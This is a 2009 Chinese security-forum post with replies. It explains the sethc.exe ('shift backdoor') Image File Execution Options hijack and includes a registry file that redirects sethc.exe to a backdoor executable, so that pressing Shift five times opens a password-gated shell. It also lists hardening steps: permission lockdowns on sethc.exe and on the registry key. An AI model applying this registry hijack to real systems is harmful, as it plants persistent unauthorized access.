标题:
【分享】sethc.exe新的镜像劫持技术和安全防御!(shift后门)
[打印本页]
作者:
良思俊旭
时间:
2009-11-17 10:22
标题:
【分享】sethc.exe新的镜像劫持技术和安全防御!(shift后门)
很多朋友发我个shift后门,带镜像劫持的,可以按5下shift,然后输入密码.
5下shift → 不关闭 → 然后鼠标右键点出来的那个框框右下角...
前提是先运行个p处理或reg,这个方法比较牛X..
注册表如下
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\
www.winshell.cn.exe
"
信息来自:
http://www.3ast.com.cn
这个exe存的路径是:c:\\
www.winshell.cn.exe
黑客
-----------------------------------------------------以下是安全设置---------------------------
黑客
知道上边原理:就可以设置安全了....
在服务器里按5下shift,出设置把所有的对号去掉.
删除所有文件安全设置下用户,加everyone设置全部拒绝
C:\WINDOWS\system32和C:\WINDOWS\system32\dllcache的sethc.exe
修改注册表权限,同上.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
网络安全
作者:
ohsky000
时间:
2010-2-12 21:03
shift后门?看不大懂
作者:
ohsky000
时间:
2010-2-12 21:04
shift后门?看不大懂
作者:
come08
时间:
2010-11-3 16:06
shift后门?看不大懂
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2